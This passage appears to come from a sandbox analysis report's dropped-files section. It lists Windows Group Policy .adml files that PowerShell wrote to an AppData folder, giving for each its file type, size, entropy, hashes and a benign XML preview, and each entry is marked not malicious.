                                                                                          Category:dropped
                                                                                          Size (bytes):7775
                                                                                          Entropy (8bit):4.801945943527714
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Els7BYDGrS9SqHBf0IpqGKJkPsmcjtJiANpyhSz9zxbBiy:A0bMsBHiANpyh89zxbl
                                                                                          MD5:A2F0FA1F7B955635BAEF6D42E1019FAD
                                                                                          SHA1:52F10ED5BB525A53AD000BAB3D0AD3A8CC696CB9
                                                                                          SHA-256:F54FFC98753D1F03710F912F456B1639B18EC692D2E41FF529A79C5BA8A38B8B
                                                                                          SHA-512:1BB3F4D5A8895C0AA0373E6EBA93636B022BB9709DE40408C46924664A63390593B386EF5A3968F0DBA8DB31F02AFB20455C7AAB95E2498DEB466E89C335D0D9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="L_IME">IME</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReport">Turn on misconversion logging for misconversion report</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReportExplain">This policy setting allows you to turn on logging of misconversion for the misconversion report.....If you enable this policy setting, misconversion logging is turned on.....If you disable or do not configure this policy setting, misconversion logging is turned off. ....This policy sett

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EarlyLaunchAM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with very long lines (335), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2537
                                                                                          Entropy (8bit):4.7263609685346974
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:yafKUwDTjsFQCzwDNgVC2G1KJzDD8xr2rZkwJXW2V:yuujKQCzwDWC2G1wzDQr2rZkaV
                                                                                          MD5:75AAE2A1219696C7D046F25DA1C331B8
                                                                                          SHA1:0E20307FC43CECFD876B2A03CE998204A4A9D932
                                                                                          SHA-256:5A5BAD4A99052A7DFFAD794A712F606F4421D0323AF8BA4121BB02034C917C1C
                                                                                          SHA-512:18DE3563DB066BB209792A31096B0B98BDF8C2BFE9BBE077D9F2443513F60D3896ACECA4362D26F08F1CF43E3E37EEE242D2E608958E0CFF2136DA65A9B1AB46
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ELAMCategory">Early Launch Antimalware</string>.. <string id="POL_DriverLoadPolicy_Name">Boot-Start Driver Initialization Policy</string>.. <string id="POL_DriverLoadPolicy_Name_Help">This policy setting allows you to specify which boot-start drivers are initialized based on a classification determined by an Early Launch Antimalware boot-start driver. The Early Launch Antimalware boot-start driver can return the following classifications for each boot-start driver:..- Good: The driver has been signed and has not been tampered with...- Bad: The driver has been identified as malware. It is recommended that you do not allow known bad drivers to be initialized...- Bad, but required for boot: The driver has been identified as malware, but the computer cannot

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EdgeUI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4475
                                                                                          Entropy (8bit):4.731397984218957
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cs+D5x8gm8fK0QfhWpiSbXFNWf7DwirbOgSuvmrIvZZsSuvLD49MCD49Ms+qDxsL:P+D5pmYYh7SeDDrbQUCMOZxq0/tWFV
                                                                                          MD5:47245202B642C2B6443C63A220226B22
                                                                                          SHA1:6C3DEDBC58314BF1EDCA6EA0D8161E80B8013B1D
                                                                                          SHA-256:59B4266A7E379E4047910594D63B44F4A251684A3C97F74CC16585B2779871AD
                                                                                          SHA-512:4470B0A9568B88965C077F8690BB48BEA88D15A148F2C402D47C17EBB6F52BFB1194FB4B0C328E22DC3772FEF38DCF4E0D33FC966312CAFDFCFA1D0F2539D7E8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EdgeUI">Edge UI</string>.. <string id="EdgeUI_Help">Contains settings related to system user interfaces attached to the screen edges.</string>.. <string id="TurnOffBackstack">Turn off switching between recent apps</string>.. <string id="TurnOffBackstack_Help">If you enable this setting, users will not be allowed to switch between recent apps. The App Switching option in the PC settings app will be disabled as well.....If you disable or do not configure this policy setting, users will be allowed to sw

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EncryptFilesonMove.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1260
                                                                                          Entropy (8bit):4.910898508580554
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ykJvSmJjbLgn7OL2dOrL0ZFp4D/FV:cgeD5x8gm8fKvJDJ074rFV
                                                                                          MD5:F09A4E370D3321A61FC7456B9A007360
                                                                                          SHA1:58E0F3E0213B3FF00E2C6694D6A0D3A71D9DE55E
                                                                                          SHA-256:E32ECF04721C0695C125F1F8E3ECC0ED14179FC85045C1C44C0D4CCDAA74D085
                                                                                          SHA-512:0BEB4C675E79A2234CAD73F0ADBCAE49B7ED4CD8F62BD6DAC0985EB4C9DBF7C3387B2CEB74C67C2D0052287FD436BECF8D415D22ED72AAB7B296E15C9DFEFECC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoEncryptOnMove">Do not automatically encrypt files moved to encrypted folders</string>.. <string id="NoEncryptOnMove_Help">This policy setting prevents File Explorer from encrypting files that are moved to an encrypted folder.....If you enable this policy setting, File Explorer will not automatically encrypt files that are moved to an encrypted folder.....If you disable or do not configure this policy setting, File Explorer automatically encrypts files that are moved to an encrypted folder.....This setting ap

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ErrorReporting.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):30768
                                                                                          Entropy (8bit):4.691623979168484
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hAUh6Hw6B8HwwHhZK3KwrQGj4UQ6ic6jKqBO1Mck1S:hAU8MwwHnwiUQXro
                                                                                          MD5:8AB1308CBA6530C458F432AB454C3070
                                                                                          SHA1:099E6CF6F6108281974B2992B3B40E0AED58A994
                                                                                          SHA-256:0E087D6F548B2CDBF2C2EA12CE78DC4F8B9D1A4979AE6FD955CAC4D350AAFABD
                                                                                          SHA-512:C19FDEC863339CB92AF86EE3C2244A13E330B4641241A693D1BD61128AB3A13076652AAD0AC8EB8D757760437311CB12CD94D43AC947CE0361EEA7E8DC99E60D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Error Reporting</displayName>.. <description>Windows Error Reporting</description>.. <resources>.. <stringTable>.. <string id="CAT_WindowsErrorReporting">Windows Error Reporting</string>.. <string id="CAT_WindowsErrorReportingAdvanced">Advanced Error Reporting Settings</string>.. <string id="CAT_WindowsErrorReportingConsent">Consent</string>.. <string id="PCH_AllOrNoneDef">Default application reporting settings</string>.. <string id="PCH_AllOrNoneDef_Exclude">Do not report any application errors</string>.. <string id="PCH_AllOrNoneDef_Help">This policy setting controls whether errors in general applications are in

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventForwarding.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2548
                                                                                          Entropy (8bit):4.859559586253688
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3KbFDiCUSNsojnPFc9QABiRop6FkY060S9vEWmwlCXFfD1ui/5asx6g7wGuVmoeV:65DySNPjPuSRopa0i8tFBnBrhwGZoeV
                                                                                          MD5:0A764BB7FD1C2BC83CBBA71BDC3F8EB0
                                                                                          SHA1:A7234960D73C854F981680AD4691ACCC5E3F2024
                                                                                          SHA-256:EF69C13304DBA64691227AC0C87F03C89120BEB6003722C43E390BDA572331AD
                                                                                          SHA-512:0F5E549755270FD2E40669321F4E69581BBCB79CE7D905BB6E95E9251C10B76681C6ED19BA623D17C8AD56DD39A6D0104BE60DD0B5FE8045BC4EB8217ED4E772
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0">...<displayName>Event Forwarding</displayName>.....<description>Policy Definitions For Event Forwarding</description>.....<resources>......<stringTable>.......<string id="EventForwarding">Event Forwarding</string>.... <string id="ForwarderResourceUsage">Configure forwarder resource usage</string>.. <string id="ForwarderResourceUsage_Help">This policy setting controls resource usage for the forwarder (source computer) by controlling the events/per second sent to the Event Collector.....If you enable this policy setting, you can control the volume of events sent to the Event Collector by the source computer. This may be required in high volume environments.....If you disable or do not configure this policy setting, forwarder resource usage is not specified.....This setting applies across all subscriptions for the forwarder (source computer).</string>.. .....<

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventLog.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7756
                                                                                          Entropy (8bit):4.821366715902771
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EuPOfDUFRKtm/P2R7gHzBwRTLfdpSJlIau:bPOfA+g2RCudH
                                                                                          MD5:B58D99D32DF6E1076E976FA8ABC3EEEA
                                                                                          SHA1:4AB6E78ECDC35F98D09AE29B0D7C8D9AB19A91FD
                                                                                          SHA-256:2863EF5940EC4685D1CF61891191647CE435F325720BC9626A0F2214F56E6EC9
                                                                                          SHA-512:9A0FF4D6D9BB1A53F01A24DD946945CAB0D4A48053035A8435B4CFB0DCF7690C0CC418E72911FCFBA8379617D328253C236F307F62D1627B0087747816D6AAFE
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Channel_Log_AutoBackup">Back up log automatically when full</string>.. <string id="Channel_Log_AutoBackup_Help">This policy setting controls Event Log behavior when the log file reaches its maximum size and takes effect only if the "Retain old events" policy setting is enabled.....If you enable this policy setting and the "Retain old events" policy setting is enabled, the Event Log file is automatically closed and renamed when it is full. A new file is then started.....If you disable this policy setting and th

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EventViewer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2368
                                                                                          Entropy (8bit):4.905404060928818
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQHXEjH4Mj1Zy3snm5R0mM/CJ4tFOmBXOm70oV:cgeD5x8gm8fKI/szB4tFZUoV
                                                                                          MD5:45EB132CB1F927D22C54EC385A552153
                                                                                          SHA1:634D98CB8F8BFE12E9CD19CD4764DFCF134CC011
                                                                                          SHA-256:8911189FB55D6DE6DA90E3ED57336AA7F2323520CF2719CED2E91B76B4AB085D
                                                                                          SHA-512:32ECD99085199B267FEA70CA5363DFF1270BC083107E80368FD7F48C69E8646078ACFFA3206692CF3F2BF447D4EBB5BBB251F32F1DD712927F836F5751FF47AF
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EventViewer">Event Viewer</string>.. <string id="EventViewer_RedirectionProgram">Events.asp program</string>.. <string id="EventViewer_RedirectionProgram_Help">This is the program that will be invoked when the user clicks the events.asp link.</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters">Events.asp program command line parameters</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters_Help">This specifies the command line parameters that will be p

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Explorer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4363
                                                                                          Entropy (8bit):4.775276168335737
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmUZsDKU5h9ERZR2s0vJVu2MNFBBzUysV:EpZsDx9g0vJVBMNXBzi
                                                                                          MD5:B8789197191F1A2C461797C595FD8415
                                                                                          SHA1:DDCB4910A18C318E8E90CF29A92FE70ADFDB20EE
                                                                                          SHA-256:6CBA67BF6D239FA46E6F2566F1F8653DCBA053DC828AA731DD768C525AF1BB1D
                                                                                          SHA-512:D05BF9DE3D8ADD27206F4819283E89533AC83ED97AF159023EF46393B5CAB9D5D95D4C32D15C21A0E895CE3820418D71D29553E420F1ADAE7225AEEEFBE1A91E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AlwaysShowClassicMenu">Display the menu bar in File Explorer </string>.. <string id="AlwaysShowClassicMenu_Help">This policy setting configures File Explorer to always display the menu bar.....Note: By default, the menu bar is not displayed in File Explorer.....If you enable this policy setting, the menu bar will be displayed in File Explorer.....If you disable or do not configure this policy setting, the menu bar will not be displayed in File Explorer.....Note: When the menu bar is not displayed, users can ac

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ExternalBoot.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2806
                                                                                          Entropy (8bit):4.897245212995506
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gmFa0I0aUFxafehoPd7idK6a0WaZP5Zo5Z0fd5Z1zarCaO5ZVwKd5ZUwY:LeD5pmFa0I0a4afIa9aZPMcda2aOSYvY
                                                                                          MD5:8417153A964B75197B8A08F35D62C381
                                                                                          SHA1:2A4820E67495FCCC524E72AFAB923803755C9F2B
                                                                                          SHA-256:F8B25ED02542858011F65AE02EBD1C4A62558EE28B76A281656FCF1A70E772BC
                                                                                          SHA-512:F1DEC0EA5AA367C94CCE27B71B3412FCE370CFF75DF44CCEA5CA931BB52992B30D252144188DFA93FE9E5EF573419DF8BCAEAE9C5DFBA8936E24C80CBDC4D291
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Portable Workspace</displayName>.. <description>This file contains Portable Workspace policy settings.</description>.. <resources>.. <stringTable>.. <string id="PortableOperatingSystem">Portable Operating System</string>.. <string id="PortableOperatingSystem_Launcher_DisplayName">Windows To Go Default Startup Options</string>.. <string id="PortableOperatingSystem_Launcher_Help">....This policy setting controls whether the PC will boot to Windows To Go if a USB device containing a Windows To Go workspace is connected, and controls whether users can make changes using the Windows To Go Startup Options Control Panel item.....If you enable

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileHistory.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):988
                                                                                          Entropy (8bit):5.031142948192133
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3F6Et8mTc48vzNgW4ZdNHW4fFV:cgeD5x8gm/TagW4Z/HW4fFV
                                                                                          MD5:76EF9C90CFE65DE37CDBCD4847D584BE
                                                                                          SHA1:72977FE03FBED6B2FF3C750405CA0838A547471A
                                                                                          SHA-256:9341A249C8DB566C91BD171482DAA2FAF9D17EF757DB6CBE6829F75D4FCE9492
                                                                                          SHA-512:2788E014B9335C70D55EBC24139D09C862D3D016B043566A126E2956B53622F443AEE92B5C28BA83B5C670AD03D948BB6D4435B090BFBB992E33DC2F83D01E2F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File History</displayName>.. <description>File History</description>.. <resources>.. <stringTable>.. <string id="FileHistoryName">File History</string>.. <string id="DisableFileHistory">Turn off File History</string>.. <string id="DisableFileHistory_explanation">This policy setting allows you to turn off File History.....If you enable this policy setting, File History cannot be activated to create regular, automatic backups.....If you disable or do not configure this policy setting, File History can be activated to create regular, automatic backups.</string>.. </stringTable>.. </resources>..</policyDefinitionResources>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileRecovery.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2975
                                                                                          Entropy (8bit):4.8069063103068785
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKn8YD6KENYYqgFd67gJDqrq5x0BsYukrtP4XEgV:LeD5pm3D0uWFm2DaqjCswtPeV
                                                                                          MD5:353E01C633CBAF640B8238C535A4E3BC
                                                                                          SHA1:0FC2C8473CB1298245F8D2893D796C3B3BEA14EC
                                                                                          SHA-256:3A5992E2DC42003E6F1547CE4253134CF8C6270DA6F68FCB6E3FA854B07FADE1
                                                                                          SHA-512:A7BE0B5FF87A6EEBD9A1CCA5F72DF27DD9A1DBEB127ADE55AC80CA10C7A5084EB87ECE4143724E5920057F6E533AE809E551C62E88876CCF8A16FAF8AB8A1358
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted files to one of three states:....Regular: Detection, troubleshooting, and recovery of corrupted files will automatically start with a minimal UI display. Windows will attempt to present you with a dialog box when a system restart is

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileRevocation.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2614
                                                                                          Entropy (8bit):4.778560797244179
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c4D5FL8golENFW8jxk1tQYY4DXOc3I+4QZHD75LhhAOoXV:RD5FPoWNFWweQD4TV1Zv5LhHoXV
                                                                                          MD5:85E6DEC7D2E9D6A930AE1A7B4C9E6CE9
                                                                                          SHA1:A8C71091F223CD0DCDF3AA8AE4A2D6E1888FD69E
                                                                                          SHA-256:1E5E1B42CFB88B5072DADEB281779586616FC8A3493F66EE17557A19D9ABC27D
                                                                                          SHA-512:F0076C0E98DE7CBD06723E647B7CF654CF85CE262832321606FCA066B22FC4C70635D183F2E1F8BD77AA9FC99F9EDEE8BF909DD8708AA3C01F0A8164FEEE9D98
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. Documentation says these are optional, but GPEdit does not agree-->.. <displayName>File Revocation Policy Settings</displayName>.. <description>File Revocation Policy Settings</description>.. <resources>.. <stringTable>.. <string id="FileRevocationCategory">File Revocation</string>.. <string id="DelegatedPackageFamilyNames_Name">Allow Windows Runtime apps to revoke enterprise data</string>.. <string id="DelegatedPackageFamilyNames_Help">Windows Runtime applications can protect content which has been associated with an enterprise identifier (EID), but can only revoke access to content it protected. To allow an application to revoke

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileServerVSSProvider.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1516
                                                                                          Entropy (8bit):4.992519754988731
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8g4t4+3Fbef61yjhZEPaREbCF2LRz8u4tUtTY45y9Qy52fKKnKHPaMfV:cgeD5x8gU8fK8hOaRmC0Rz8u4tYTFynR
                                                                                          MD5:BFBE8A2102D1DAD98FC3B6A7C9D49809
                                                                                          SHA1:D2B7FA51C1458FF163A3A687687BC79615A0950E
                                                                                          SHA-256:DA1FFF29710B8B4D5D3361E38FE64B66D7A39F70AB98D23F02C2F285C7298817
                                                                                          SHA-512:798D71F3589C310441205512EDF99AC939A53BD7A4381BE6908722C9C41B03788AE7BE9D2B59083D7D39E76D9CFA8D7EA1DD4BCFD3800602188A6185C64B6941
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Component name -->.. <string id="Cat_FileShareShadowCopyProvider">File Share Shadow Copy Provider</string>.. Component name -->.... <string id="Pol_EncryptProtocol">Allow or Disallow use of encryption to protect the RPC protocol messages between File Share Shadow Copy Provider running on application server and File Share Shadow Copy Agent running on the file servers.</string>.. <string id="Pol_EncryptProtocol_Help">Determines whether the RPC protocol messagese used by VSS for SMB2 File Shares feat

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FileSys.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5047
                                                                                          Entropy (8bit):4.778189792452432
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fK0BR2avs7FFiTs5UXs5Zg3NZRWwzL9oaVdQMxITRnRZ6LutwOXsQU:LeD5pmus7asQsyxVOnJIV
                                                                                          MD5:F1951FB8C3B9EEBE23ABEF5EE23DBA39
                                                                                          SHA1:FBAB4967D796A04FB164024D8C543D676E44BD24
                                                                                          SHA-256:40A867EB9B6B1644CDF87AC77D346485DA153B245603237FA9A76E2C68ACFD4B
                                                                                          SHA-512:9604C7324D2FE2EC3C40D90E0C3747B6BBBF20186F7A6A695D947C9F1FEB727875066CC700C31291BA156C0BA83893917AF4A7BEDC37208D4500B88DF22D9079
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Filesystem">Filesystem</string>.. <string id="NTFS">NTFS</string>.. <string id="SymlinkEvalExplain">Symbolic links can introduce vulnerabilities in certain applications. To mitigate this issue, you can selectively enable or disable the evaluation of these types of symbolic links:....Local Link to a Local Target..Local Link to a Remote Target..Remote Link to Remote Target..Remote Link to Local Target....For further information please refer to the Windows Help section....NOTE: If this policy is Disabled or

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FolderRedirection.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7951
                                                                                          Entropy (8bit):4.723629934992763
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm0w3a/059U9dRz1zAkpsx1zAkWMOUH+fH/s3RpeWCBNTAynMydWcS5Pv0rA:EEVzAT7p67WMF+3s3RV5yMydWz5P0A
                                                                                          MD5:B0E17494D027C66AD4CC97FE5D2E6108
                                                                                          SHA1:D382CFCD7145A738FC23FE78BC925DB11E9C5A42
                                                                                          SHA-256:0144A87B8D59221D8C76B55A64743F6AD72FEC812242669C05421D4D07321383
                                                                                          SHA-512:65256FCD792B464E49B8A04D00442F5B4FC358337E3F6B3DDA4F3B14BA7C460A9825F1D7FF22A2C39FC1A12C188C724C0C82D3FB1A602D193D5F693D8D4335BA
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Fdeploy_Cat">Folder Redirection</string>.. <string id="LocalizeXPRelativePaths">Use localized subfolder names when redirecting Start Menu and My Documents</string>.. <string id="LocalizeXPRelativePaths_Help">This policy setting allows the administrator to define whether Folder Redirection should use localized names for the All Programs, Startup, My Music, My Pictures, and My Videos subfolders when redirecting the parent Start Menu and legacy My Documents folder respectively.....If you enable this policy s

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FramePanes.adml

